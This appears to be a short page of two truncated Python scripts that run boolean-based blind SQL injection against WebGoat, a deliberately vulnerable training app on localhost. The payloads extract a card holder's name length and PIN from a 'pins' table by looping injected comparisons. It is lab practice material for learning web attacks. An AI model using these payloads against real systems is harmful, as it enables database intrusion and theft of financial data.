JWS

import requests url='http://localhost:8080/WebGoat/attack?Screen=1315528047&menu=1100' cookie={'JSESSIONID' : '2C39E081510CA8F799595014F02D79A7'} #접속할 때마다 달라짐. words="101 and length(select name from pins where cc_number='4321432143214321') >" for i in range(0, 10): data= {'account_number': words + str(i), 'SUMBIT':'GO!'} res=requests.post(url, data=data, cookies=cookie) if 'Account number is val..

import requests url = 'http://localhost:8080/WebGoat/attack?Screen=586116895&menu=1100' headers={'Content-Type' : 'application/x-www-form-urlencoded;'} cookie = {'JSESSIONID' : '758026477EFE927534DDA6CCB9F2058A'} words= "101 and (select pin from pins where cc_number = '1111222233334444') >" for k in range(1,10): data={'account_number' : words + str(10**k), 'SUBMIT': 'GO!'} res=requests.post(url,..